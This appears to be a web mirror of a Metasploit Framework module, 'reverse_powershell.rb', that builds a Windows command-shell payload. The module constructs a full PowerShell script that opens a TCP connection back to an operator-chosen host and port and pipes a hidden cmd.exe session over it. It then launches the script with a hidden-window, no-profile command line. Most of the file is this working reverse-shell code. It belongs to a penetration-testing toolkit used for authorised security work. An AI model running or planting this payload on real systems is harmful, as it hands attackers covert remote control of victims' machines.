CoCalc -- reverse_powershell.rb

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/cmd/windows/reverse_powershell.rb
¹⁹⁵⁶⁷ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = 1588
8

9
  include Msf::Payload::Single
10
  include Msf::Sessions::CommandShellOptions
11

12
  def initialize(info = {})
13
    super(
14
      merge_info(
15
        info,
16
        'Name' => 'Windows Command Shell, Reverse TCP (via Powershell)',
17
        'Description' => 'Connect back and create a command shell via Powershell',
18
        'Author' => [
19
          'Dave Kennedy', # Original payload from trustedsec on SET
20
          'Ben Campbell' # Metasploit module
21
        ],
22
        'References' => [
23
          ['URL', 'https://github.com/trustedsec/social-engineer-toolkit/blob/master/src/powershell/reverse.powershell']
24
        ],
25
        # The powershell code is from SET, copyrighted by TrustedSEC, LLC and BSD licensed -- see https://github.com/trustedsec/social-engineer-toolkit/blob/master/readme/LICENSE
26
        'License' => MSF_LICENSE,
27
        'Platform' => 'win',
28
        'Arch' => ARCH_CMD,
29
        'Handler' => Msf::Handler::ReverseTcp,
30
        'Session' => Msf::Sessions::CommandShell,
31
        'PayloadType' => 'cmd',
32
        'RequiredCmd' => 'powershell',
33
        'Payload' => {
34
          'Offsets' => {},
35
          'Payload' => ''
36
        }
37
      )
38
    )
39
    register_advanced_options(
40
      [
41
        OptString.new('PowerShellPath', [true, 'The path to the PowerShell executable', 'powershell'])
42
      ]
43
    )
44
  end
45

46
  #
47
  # Constructs the payload
48
  #
49
  def generate(_opts = {})
50
    return super + command_string
51
  end
52

53
  #
54
  # Returns the command string to use for execution
55
  #
56
  def command_string
57
    lhost = datastore['LHOST']
58
    lport = datastore['LPORT']
59
    powershell = %^
60
$a='#{lhost}';
61
$b=#{lport};
62
$c=New-Object system.net.sockets.tcpclient;
63
$nb=New-Object System.Byte[] $c.ReceiveBufferSize;
64
$ob=New-Object System.Byte[] 65536;
65
$eb=New-Object System.Byte[] 65536;
66
$e=new-object System.Text.UTF8Encoding;
67
$p=New-Object System.Diagnostics.Process;
68
$p.StartInfo.FileName='cmd.exe';
69
$p.StartInfo.RedirectStandardInput=1;
70
$p.StartInfo.RedirectStandardOutput=1;
71
$p.StartInfo.RedirectStandardError=1;
72
$p.StartInfo.UseShellExecute=0;
73
$q=$p.Start();
74
$is=$p.StandardInput;
75
$os=$p.StandardOutput;
76
$es=$p.StandardError;
77
$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);
78
$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);
79
$c.connect($a,$b);
80
$s=$c.GetStream();
81
while ($true) {
82
    start-sleep -m 100;
83
    if ($osread.IsCompleted -and $osread.Result -ne 0) {
84
      $r=$os.BaseStream.EndRead($osread);
85
      $s.Write($ob,0,$r);
86
      $s.Flush();
87
      $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);
88
    }
89
    if ($esread.IsCompleted -and $esread.Result -ne 0) {
90
      $r=$es.BaseStream.EndRead($esread);
91
      $s.Write($eb,0,$r);
92
      $s.Flush();
93
      $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);
94
    }
95
    if ($s.DataAvailable) {
96
      $r=$s.Read($nb,0,$nb.Length);
97
      if ($r -lt 1) {
98
          break;
99
      } else {
100
          $str=$e.GetString($nb,0,$r);
101
          $is.write($str);
102
      }
103
    }
104
    if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {
105
        break;
106
    }
107
    if ($p.ExitCode -ne $null) {
108
        break;
109
    }
110
}
111
^.gsub!("\n", '')
112

113
    "#{datastore['PowerShellPath']} -w hidden -nop -c #{powershell}"
114
  end
115
end
116

117
Product

Resources

Company
